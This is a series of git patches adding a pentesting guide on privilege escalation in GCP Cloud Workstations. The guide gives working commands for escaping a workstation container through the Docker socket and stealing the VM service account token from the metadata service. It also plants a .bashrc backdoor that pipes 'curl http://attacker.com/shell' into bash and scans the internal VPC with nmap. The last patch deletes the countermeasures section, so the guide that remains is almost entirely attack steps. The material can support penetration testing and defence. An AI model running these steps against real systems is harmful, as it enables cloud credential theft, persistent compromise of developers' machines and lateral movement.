From 4a16d25bfe51a53a06db0bf77699346eb0ef1efd Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:08:37 -0600
Subject: [PATCH 1/4] Add GCP Cloud Workstations privesc guide

Add a new guide documenting privilege escalation paths for GCP Cloud Workstations. Covers Docker-in-Docker container breakout via /var/run/docker.sock, step-by-step escape to the host VM, stealing the VM service account token from IMDS, persistence by backdooring the host home, network pivot techniques, and recommended countermeasures. Includes reference to an automation script and training banners.
---
 .../gcp-cloud-workstations-privesc.md         | 124 ++++++++++++++++++
 1 file changed, 124 insertions(+)
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
new file mode 100644
index 0000000000..51923872de
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -0,0 +1,124 @@
+# GCP - Cloud Workstations Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Workstations
+
+For more information about Cloud Workstations check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-workstations-enum.md
+{{#endref}}
+
+### Container Breakout via Docker Socket (Container -> VM -> Project)
+
+The primary privilege escalation path in Cloud Workstations stems from the requirement to support **Docker-in-Docker (DinD)** workflows for developers. When the workstation configuration mounts the Docker socket or allows privileged containers (a common configuration), an attacker inside the workstation container can escape to the underlying Compute Engine VM and steal its service account token.
+
+**Prerequisites:**
+- Access to a Cloud Workstation terminal (via SSH, compromised session, or stolen credentials)
+- The workstation configuration must mount `/var/run/docker.sock` or enable privileged containers
+
+**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime.
+
+> [!NOTE]
+> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM.
+
+<details>
+
+<summary>Step 1: Check for Docker socket</summary>
+
+```bash
+# Verify the Docker socket is available
+ls -l /var/run/docker.sock
+# Expected output: srw-rw---- 1 root docker 0 ...
+```
+
+</details>
+
+<details>
+
+<summary>Step 2: Escape to the host VM filesystem</summary>
+
+We launch a privileged container, mounting the host's root directory to `/mnt/host`. We also share the host's network and PID namespace to maximize visibility.
+
+```bash
+# Spawn a privileged container mounting the host's root filesystem
+docker run -it --rm --privileged --net=host --pid=host \
+  -v /:/mnt/host \
+  alpine sh
+
+# Inside the new container, chroot into the host
+chroot /mnt/host /bin/bash
+```
+
+You now have a **root shell on the underlying Compute Engine VM** (Layer 1).
+
+</details>
+
+<details>
+
+<summary>Step 3: Steal the VM service account token from IMDS</summary>
+
+```bash
+# From the host VM, query the Instance Metadata Service
+curl -s -H "Metadata-Flavor: Google" \
+  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
+
+# Check which service account is attached
+curl -s -H "Metadata-Flavor: Google" \
+  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email
+
+# Check scopes (CRITICAL STEP)
+curl -s -H "Metadata-Flavor: Google" \
+  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes
+```
+
+</details>
+
+> [!CAUTION]
+> **Check the Scopes!**
+> Even if the attached Service Account is **Editor**, the VM might be restricted by access scopes.
+> If you see `https://www.googleapis.com/auth/cloud-platform`, you have full access.
+> If you only see `logging.write` and `monitoring.write`, you are limited to the **Network Pivot** and **Persistence** vectors below.
+
+<details>
+
+<summary>Step 4: Achieve Persistence (Backdoor the User)</summary>
+
+Cloud Workstations mount a persistent disk to `/home/user`. Because the container user (usually `user`, UID 1000) matches the host user (UID 1000), you can write to the host's home directory. This allows you to backdoor the environment even if the workstation container is rebuilt.
+
+```bash
+# Check if you can write to the host's persistent home
+ls -la /mnt/host/home/user/
+
+# Drop a backdoor that executes next time the developer logs in
+# Note: Do this from the container escape context
+echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc
+```
+
+</details>
+
+<details>
+
+<summary>Step 5: Network Pivot (Internal VPC Access)</summary>
+
+Since you share the host network namespace (`--net=host`), you are now a trusted node on the VPC. You can scan for internal services that allow access based on IP whitelisting.
+
+```bash
+# Install scanning tools on the host (if internet access allows)
+apk add nmap
+
+# Scan the internal VPC subnet
+nmap -sS -p 80,443,22 10.0.0.0/8
+```
+
+</details>
+
+**Countermeasures:**
+
+* Disable "Running as root" in the Workstation Configuration
+* Do not mount `/var/run/docker.sock` — use remote builders (e.g., Cloud Build) instead
+* Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`)
+* Place the workstation project inside a **VPC Service Controls** perimeter
+
+{{#include ../../../banners/hacktricks-training.md}}

From 6b1b2329c24a2107842d20f344a66653bb537849 Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:10:20 -0600
Subject: [PATCH 2/4] Clean up GCP Cloud Workstations privilege escalation doc

Removed introductory content and references related to Cloud Workstations.
---
 .../gcp-cloud-workstations-privesc.md                    | 9 ---------
 1 file changed, 9 deletions(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index 51923872de..ec5a353a35 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -1,14 +1,5 @@
 # GCP - Cloud Workstations Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-## Cloud Workstations
-
-For more information about Cloud Workstations check:
-
-{{#ref}}
-../gcp-services/gcp-cloud-workstations-enum.md
-{{#endref}}
 
 ### Container Breakout via Docker Socket (Container -> VM -> Project)
 

From 0be98dc154a514f95e8f01ad5a1cc5d691c08716 Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:12:22 -0600
Subject: [PATCH 3/4] Remove hacktricks-training banner from documentation

Removed the inclusion of hacktricks-training banner from the GCP privilege escalation documentation.
---
 .../gcp-privilege-escalation/gcp-cloud-workstations-privesc.md  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index ec5a353a35..a0019a234b 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -112,4 +112,4 @@ nmap -sS -p 80,443,22 10.0.0.0/8
 * Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`)
 * Place the workstation project inside a **VPC Service Controls** perimeter
 
-{{#include ../../../banners/hacktricks-training.md}}
+

From 2bb129291247eee3f6f619313fe6b2fb1a622e89 Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:16:44 -0600
Subject: [PATCH 4/4] Remove countermeasures from GCP privilege escalation doc

Removed countermeasures section from GCP privilege escalation documentation.
---
 .../gcp-cloud-workstations-privesc.md                       | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index a0019a234b..57cd6bc399 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -105,11 +105,5 @@ nmap -sS -p 80,443,22 10.0.0.0/8
 
 </details>
 
-**Countermeasures:**
-
-* Disable "Running as root" in the Workstation Configuration
-* Do not mount `/var/run/docker.sock` — use remote builders (e.g., Cloud Build) instead
-* Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`)
-* Place the workstation project inside a **VPC Service Controls** perimeter